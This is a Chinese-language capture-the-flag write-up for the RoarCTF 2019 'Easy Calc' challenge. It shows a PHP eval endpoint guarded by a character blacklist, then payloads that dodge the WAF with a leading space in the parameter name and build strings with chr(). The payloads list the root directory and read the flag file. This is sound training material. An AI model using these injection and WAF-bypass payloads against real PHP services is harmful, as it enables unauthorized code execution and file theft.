【BUUCTF】------web之 [RoarCTF 2019]Easy Calc

打开连接 随便输入1+1 没什么信息
F12 发现俩个点：1：设置了waf
2.calc.php
那么 访问 http://node3.buuoj.cn:28064/calc.php
得到

error_reporting(0);
if(!isset($_GET['num'])){
     
    show_source(__FILE__);
}else{
     
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
     
                if (preg_match('/' . $blackitem . '/m', $str)) {
     
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?> 

直接?num=scandir(’’/’’)但是字符已经被ban了
所以使用chr(47)代替
?num=scandir(chr(47)) 但是 403了

这时考虑waf是否拦截变量num值为字母时。那么我们可以把num前加个空格 变成? num=scandir(chr(47)) 。php解析时会把空格去掉 前面加空格可以绕过。回显为Array
尝试打印
? num=var_dump(scandir(chr(47)))得到
array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }

发现flag：[7]=> string(5) “f1agg”
payload：calc.php? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

挺有意思的一道题 学到了~